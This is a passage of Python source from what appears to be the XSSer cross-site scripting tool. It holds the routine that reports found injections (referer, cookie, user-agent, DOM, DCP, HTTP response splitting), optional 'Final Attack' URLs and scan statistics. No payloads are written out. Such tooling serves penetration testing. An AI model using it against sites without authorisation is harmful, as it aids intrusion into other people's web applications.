  2831. fout = open("XSSreport.raw", "w") # write better than append
  2832. for line in self.hash_found:
  2833. if self.options.heuristic or self.options.hash: # not final attack possible when checking
  2834. pass
  2835. else:
  2836. attack_url = self.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
  2837. if line[2] == "XSR":
  2838. self.xsr_found = self.xsr_found + 1
  2839. if len(self.hash_found) < 11:
  2840. if line[4]: # when query string
  2841. self.report("[+] Target:", line[6] + " | " + line[4])
  2842. else:
  2843. self.report("[+] Target:", line[6])
  2844. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2845. self.report("[!] Method: Referer Injection")
  2846. self.report("[*] Hash:", line[3])
  2847. self.report("[*] Payload:", str(Curl.referer))
  2848. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2849. if self.options.fileoutput:
  2850. fout.write("="*75)
  2851. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2852. fout.write("="*75 + "\n\n")
  2853. for h in self.hash_found:
  2854. if h[2] == "XSR":
  2855. if h[4]:
  2856. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2857. else:
  2858. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2859. fout.write("="*75 + "\n\n")
  2860. elif line[2] == "XSA":
  2861. self.xsa_found = self.xsa_found + 1
  2862. if len(self.hash_found) < 11:
  2863. if line[4]: # when query string
  2864. self.report("[+] Target:", line[6] + " | " + line[4])
  2865. else:
  2866. self.report("[+] Target:", line[6])
  2867. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2868. self.report("[!] Method: User-Agent Injection")
  2869. self.report("[*] Hash:", line[3])
  2870. self.report("[*] Payload:", str(Curl.agent))
  2871. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2872. if self.options.fileoutput:
  2873. fout.write("="*75)
  2874. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2875. fout.write("="*75 + "\n\n")
  2876. for h in self.hash_found:
  2877. if h[2] == "XSA":
  2878. if h[4]:
  2879. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2880. else:
  2881. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2882. fout.write("="*75 + "\n\n")
  2883. elif line[2] == "COO":
  2884. self.coo_found = self.coo_found + 1
  2885. if len(self.hash_found) < 11:
  2886. if line[4]: # when query string
  2887. self.report("[+] Target:", line[6] + " | " + line[4])
  2888. else:
  2889. self.report("[+] Target:", line[6])
  2890. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2891. self.report("[!] Method: Cookie Injection")
  2892. self.report("[*] Hash:", line[3])
  2893. self.report("[*] Payload:", str(Curl.cookie))
  2894. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2895. if self.options.fileoutput:
  2896. fout.write("="*75)
  2897. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2898. fout.write("="*75 + "\n\n")
  2899. for h in self.hash_found:
  2900. if h[2] == "COO":
  2901. if h[4]:
  2902. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2903. else:
  2904. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2905. fout.write("="*75 + "\n\n")
  2906. elif line[1] == "[Data Control Protocol Injection]":
  2907. self.dcp_found = self.dcp_found + 1
  2908. if len(self.hash_found) < 11:
  2909. if line[4]: # when query string
  2910. self.report("[+] Target:", line[6] + " | " + line[4])
  2911. else:
  2912. self.report("[+] Target:", line[6])
  2913. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2914. self.report("[!] Method: DCP")
  2915. self.report("[*] Hash:", line[3])
  2916. self.report("[*] Payload:", line[0])
  2917. self.report("[!] Vulnerable: DCP (Data Control Protocol)")
  2918. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2919. self.report("[*] Final Attack:", attack_url)
  2920. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2921. if self.options.fileoutput:
  2922. fout.write("="*75)
  2923. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2924. fout.write("="*75 + "\n\n")
  2925. for h in self.hash_found:
  2926. if h[4]:
  2927. if h[1] == "[Data Control Protocol Injection]":
  2928. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2929. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2930. else:
  2931. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
  2932. else:
  2933. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2934. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2935. else:
  2936. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
  2937. fout.write("="*75 + "\n\n")
  2938. elif line[1] == "[Document Object Model Injection]":
  2939. self.dom_found = self.dom_found + 1
  2940. if len(self.hash_found) < 11:
  2941. if line[4]: # when query string
  2942. self.report("[+] Target:", line[6] + " | " + line[4])
  2943. else:
  2944. self.report("[+] Target:", line[6])
  2945. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2946. self.report("[!] Method: DOM")
  2947. self.report("[*] Hash:", line[3])
  2948. self.report("[*] Payload:", line[0])
  2949. self.report("[!] Vulnerable: DOM (Document Object Model)")
  2950. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2951. self.report("[*] Final Attack:", attack_url)
  2952. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2953. if self.options.fileoutput:
  2954. fout.write("="*75)
  2955. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2956. fout.write("="*75 + "\n\n")
  2957. for h in self.hash_found:
  2958. if h[1] == "[Document Object Model Injection]":
  2959. if h[4]:
  2960. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2961. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2962. else:
  2963. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
  2964. else:
  2965. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2966. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2967. else:
  2968. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
  2969. fout.write("="*75 + "\n\n")
  2970. elif line[1] == "[Induced Injection]":
  2971. self.httpsr_found = self.httpsr_found +1
  2972. if len(self.hash_found) < 11:
  2973. if line[4]: # when query string
  2974. self.report("[+] Target:", line[6] + " | " + line[4])
  2975. else:
  2976. self.report("[+] Target:", line[6])
  2977. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2978. self.report("[!] Method: INDUCED")
  2979. self.report("[*] Hash:", line[3])
  2980. self.report("[*] Payload:", line[0])
  2981. self.report("[!] Vulnerable: HTTPsr ( HTTP Splitting Response)")
  2982. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2983. self.report("[*] Final Attack:", attack_url)
  2984. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2985. if self.options.fileoutput:
  2986. fout.write("="*75)
  2987. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2988. fout.write("="*75 + "\n\n")
  2989. for h in self.hash_found:
  2990. if h[4]:
  2991. if h[1] == "[Induced Injection]":
  2992. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2993. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2994. else:
  2995. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
  2996. else:
  2997. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2998. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2999. else:
  3000. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
  3001. fout.write("="*75 + "\n\n")
  3002. elif line[1] == "[hashing check]":
  3003. if len(self.hash_found) < 11:
  3004. if line[4]:
  3005. self.report("[+] Target:", line[6] + " | " + line[4])
  3006. else:
  3007. self.report("[+] Target:", line[6])
  3008. self.report("[+] Vector: [ " + str(line[3]) + " ]")
  3009. self.report("[!] Method:", line[2])
  3010. self.report("[*] Payload:", line[5])
  3011. self.report("[!] Status: HASH FOUND!", "\n", '-'*50, "\n")
  3012. if self.options.fileoutput:
  3013. fout.write("="*75)
  3014. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3015. fout.write("="*75 + "\n\n")
  3016. for h in self.hash_found:
  3017. if h[1] == "[hashing check]":
  3018. if h[4]:
  3019. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
  3020. else:
  3021. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
  3022. fout.write("="*75 + "\n\n")
  3023. elif line[1] == "[manual_injection]":
  3024. self.manual_found = self.manual_found + 1
  3025. if len(self.hash_found) < 11:
  3026. if line[4]: # when query string
  3027. self.report("[+] Target:", line[6] + " | " + line[4])
  3028. else:
  3029. self.report("[+] Target:", line[6])
  3030. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3031. self.report("[!] Method: MANUAL")
  3032. self.report("[*] Hash:", line[3])
  3033. self.report("[*] Payload:", line[0])
  3034. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3035. self.report("[*] Final Attack:", attack_url)
  3036. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  3037. if self.options.fileoutput:
  3038. fout.write("="*75)
  3039. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3040. fout.write("="*75 + "\n\n")
  3041. for line in self.hash_found:
  3042. if line[4]:
  3043. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3044. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3045. else:
  3046. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  3047. else:
  3048. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3049. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3050. else:
  3051. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  3052. fout.write("="*75 + "\n\n")
  3053. elif line[1] == "[Heuristic test]":
  3054. if len(self.hash_found) < 11:
  3055. if line[4]:
  3056. self.report("[+] Target:", line[6] + " | " + line[4])
  3057. else:
  3058. self.report("[+] Target:", line[6])
  3059. self.report("[+] Vector: [ " + str(line[3]) + " ]")
  3060. self.report("[!] Method:", line[2])
  3061. self.report("[*] Payload:", line[5])
  3062. self.report("[!] Status: NOT FILTERED!", "\n", '-'*50, "\n")
  3063. if self.options.fileoutput:
  3064. fout.write("="*75)
  3065. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3066. fout.write("="*75 + "\n\n")
  3067. for line in self.hash_found:
  3068. if line[4]:
  3069. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
  3070. else:
  3071. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
  3072. fout.write("="*75 + "\n\n")
  3073. else:
  3074. self.auto_found = self.auto_found + 1
  3075. if len(self.hash_found) < 11:
  3076. if line[4]: # when query string
  3077. self.report("[+] Target:", line[6] + " | " + line[4])
  3078. else:
  3079. self.report("[+] Target:", line[6])
  3080. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3081. self.report("[!] Method: URL")
  3082. self.report("[*] Hash:", line[3])
  3083. self.report("[*] Payload:", line[0])
  3084. self.report("[!] Vulnerable:", line[1])
  3085. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3086. self.report("[*] Final Attack:", attack_url)
  3087. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  3088. if self.options.fileoutput:
  3089. fout.write("="*75)
  3090. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3091. fout.write("="*75 + "\n\n")
  3092. for line in self.hash_found:
  3093. if line[4]:
  3094. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3095. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3096. else:
  3097. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
  3098. else:
  3099. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3100. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3101. else:
  3102. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
  3103. fout.write("="*75 + "\n\n")
  3104. if self.options.fileoutput:
  3105. fout.close()
  3106. if self.options.fileoutput and not self.options.filexml:
  3107. self.report("[Info] Generating report: [ XSSreport.raw ]\n")
  3108. self.report("-"*25+"\n")
  3109. if self.options.fileoutput and self.options.filexml:
  3110. self.report("[Info] Generating report: [ XSSreport.raw ] | Exporting results to: [ " + str(self.options.filexml) + " ] \n")
  3111. self.report("-"*25+"\n")
  3112. if len(self.hash_found) > 10 and not self.options.fileoutput: # write results fo file when large output (white magic!)
  3113. if not self.options.filexml:
  3114. self.report("[Info] Aborting large screen output. Generating report: [ XSSreport.raw ]\n")
  3115. self.report("-"*25+"\n")
  3116. fout = open("XSSreport.raw", "w") # write better than append
  3117. fout.write("="*75)
  3118. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3119. fout.write("="*75 + "\n\n")
  3120. for line in self.hash_found:
  3121. if line[4]:
  3122. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3123. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3124. else:
  3125. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
  3126. else:
  3127. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3128. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3129. else:
  3130. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
  3131. fout.write("="*75 + "\n\n")
  3132. fout.close()
  3133. else:
  3134. self.report("[Info] Exporting results to: [ " + str(self.options.filexml) + " ]\n")
  3135. self.report("-"*25+"\n")
  3136. # heuristic always with statistics
  3137. if self.options.heuristic:
  3138. heuris_semicolon_total_found = self.heuris_semicolon_found + self.heuris_une_semicolon_found + self.heuris_dec_semicolon_found
  3139. heuris_backslash_total_found = self.heuris_backslash_found + self.heuris_une_backslash_found + self.heuris_dec_backslash_found
  3140. heuris_slash_total_found = self.heuris_slash_found + self.heuris_une_slash_found + self.heuris_dec_slash_found
  3141. heuris_minor_total_found = self.heuris_minor_found + self.heuris_une_minor_found + self.heuris_dec_minor_found
  3142. heuris_mayor_total_found = self.heuris_mayor_found + self.heuris_une_mayor_found + self.heuris_dec_mayor_found
  3143. heuris_doublecolon_total_found = self.heuris_doublecolon_found + self.heuris_une_doublecolon_found + self.heuris_dec_doublecolon_found
  3144. heuris_colon_total_found = self.heuris_colon_found + self.heuris_une_colon_found + self.heuris_dec_colon_found
  3145. heuris_equal_total_found = self.heuris_equal_found + self.heuris_une_equal_found + self.heuris_dec_equal_found
  3146. total_heuris_found = heuris_semicolon_total_found + heuris_backslash_total_found + heuris_slash_total_found + heuris_minor_total_found + heuris_mayor_total_found + heuris_doublecolon_total_found + heuris_colon_total_found + heuris_equal_total_found
  3147. total_heuris_params = total_heuris_found + self.heuris_semicolon_found + self.heuris_backslash_found + self.heuris_slash_found + self.heuris_minor_found + self.heuris_mayor_found + self.heuris_doublecolon_found + self.heuris_colon_found + self.heuris_equal_found
  3148. total_heuris_notfound = self.heuris_semicolon_notfound + self.heuris_backslash_notfound + self.heuris_slash_notfound + self.heuris_minor_notfound + self.heuris_mayor_notfound + self.heuris_doublecolon_notfound + self.heuris_colon_notfound + self.heuris_equal_notfound
  3149. if total_heuris_notfound > 0: # not shown when not found
  3150. self.options.statistics = True
  3151. # some statistics reports
  3152. if self.options.statistics:
  3153. # heuristic test results
  3154. if self.options.heuristic:
  3155. self.report("\n"+'='*75)
  3156. self.report("[+] Heuristics:")
  3157. self.report('='*75)
  3158. test_time = datetime.datetime.now() - self.time
  3159. self.report("\n" + '-'*50)
  3160. self.report("Test Time Duration: ", test_time)
  3161. self.report('-'*50 )
  3162. total_connections = total_heuris_found + total_heuris_notfound
  3163. self.report("Total fuzzed:", total_connections)
  3164. self.report('-'*75)
  3165. self.report(' ', " <FILTERED!>", " <NOT FILTERED!>", " =" , " ASCII", "+", "UNE/HEX", "+", "DEC")
  3166. # semicolon results
  3167. self.report('; ', " ", self.heuris_semicolon_notfound, " ",
  3168. heuris_semicolon_total_found, " ",
  3169. self.heuris_semicolon_found, " ",
  3170. self.heuris_une_semicolon_found, " ",
  3171. self.heuris_dec_semicolon_found)
  3172. # backslash results
  3173. self.report('\\ ', " ", self.heuris_backslash_notfound, " ",
  3174. heuris_backslash_total_found, " ",
  3175. self.heuris_backslash_found, " ",
  3176. self.heuris_une_backslash_found, " ",
  3177. self.heuris_dec_backslash_found)
  3178. # slash results
  3179. self.report("/ ", " ", self.heuris_slash_notfound, " ",
  3180. heuris_slash_total_found, " ",
  3181. self.heuris_slash_found, " ",
  3182. self.heuris_une_slash_found, " ",
  3183. self.heuris_dec_slash_found)
  3184. # minor results
  3185. self.report("< ", " ", self.heuris_minor_notfound, " ",
  3186. heuris_minor_total_found, " ",
  3187. self.heuris_minor_found, " ",
  3188. self.heuris_une_minor_found, " ",
  3189. self.heuris_dec_minor_found)
  3190. # mayor results
  3191. self.report("> ", " ", self.heuris_mayor_notfound, " ",
  3192. heuris_mayor_total_found, " ",
  3193. self.heuris_mayor_found, " ",
  3194. self.heuris_une_mayor_found, " ",
  3195. self.heuris_dec_mayor_found)
  3196. # doublecolon results
  3197. self.report('" ', " ", self.heuris_doublecolon_notfound, " ",
  3198. heuris_doublecolon_total_found, " ",
  3199. self.heuris_doublecolon_found, " ",
  3200. self.heuris_une_doublecolon_found, " ",
  3201. self.heuris_dec_doublecolon_found)
  3202. # colon results
  3203. self.report("' ", " ", self.heuris_colon_notfound, " ",
  3204. heuris_colon_total_found, " ",
  3205. self.heuris_colon_found, " ",
  3206. self.heuris_une_colon_found, " ",
  3207. self.heuris_dec_colon_found)
  3208. # equal results
  3209. self.report("= ", " ", self.heuris_equal_notfound, " ",
  3210. heuris_equal_total_found, " ",
  3211. self.heuris_equal_found, " ",
  3212. self.heuris_une_equal_found, " ",
  3213. self.heuris_dec_equal_found)
  3214. self.report('-'*75)
  3215. try:
  3216. _accur = total_heuris_found * 100 / total_heuris_params
  3217. except ZeroDivisionError:
  3218. _accur = 0
  3219. self.report('Target(s) Filtering Accur: %s %%' % _accur)
  3220. self.report('-'*75)
  3221. # statistics block
  3222. if len(self.hash_found) + len(self.hash_notfound) == 0:
  3223. pass
  3224. if self.options.heuristic:
  3225. pass
  3226. else:
  3227. self.report('='*75)
  3228. self.report("[+] Statistics:")
  3229. self.report('='*75)
  3230. test_time = datetime.datetime.now() - self.time
  3231. self.report("\n" + '-'*50)
  3232. self.report("Test Time Duration: ", test_time)
  3233. self.report('-'*50 )
  3234. total_connections = self.success_connection + self.not_connection + self.forwarded_connection + self.other_connection
  3235. self.report("Total Connections:", total_connections)
  3236. self.report('-'*25)
  3237. self.report("200-OK:" , self.success_connection , "|", "404:" ,
  3238. self.not_connection , "|" , "503:" ,
  3239. self.forwarded_connection , "|" , "Others:",
  3240. self.other_connection)
  3241. try:
  3242. _accur = self.success_connection * 100 / total_connections
  3243. except ZeroDivisionError:
  3244. _accur = 0
  3245. self.report("Connec: %s %%" % _accur)
  3246. self.report('-'*50)
  3247. total_payloads = self.check_positives + self.manual_injection + self.auto_injection + self.dcp_injection + self.dom_injection + self.xsa_injection + self.xsr_injection + self.coo_injection
  3248. self.report("Total Payloads:", total_payloads)
  3249. self.report('-'*25)
  3250. self.report("Checker:", self.check_positives, "|", "Manual:",
  3251. self.manual_injection, "|" , "Auto:" ,
  3252. self.auto_injection ,"|", "DCP:",
  3253. self.dcp_injection, "|", "DOM:", self.dom_injection,
  3254. "|", "Induced:", self.httpsr_injection, "|" , "XSR:",
  3255. self.xsr_injection, "|", "XSA:",
  3256. self.xsa_injection , "|", "COO:",
  3257. self.coo_injection)
  3258. self.report('-'*50)
  3259. self.report("Total Injections:" ,
  3260. len(self.hash_notfound) + len(self.hash_found))
  3261. self.report('-'*25)
  3262. self.report("Failed:" , len(self.hash_notfound), "|",
  3263. "Successful:" , len(self.hash_found))
  3264. try:
  3265. _accur = len(self.hash_found) * 100 / total_injections
  3266. except ZeroDivisionError:
  3267. _accur = 0
  3268. self.report("Accur : %s %%" % _accur)
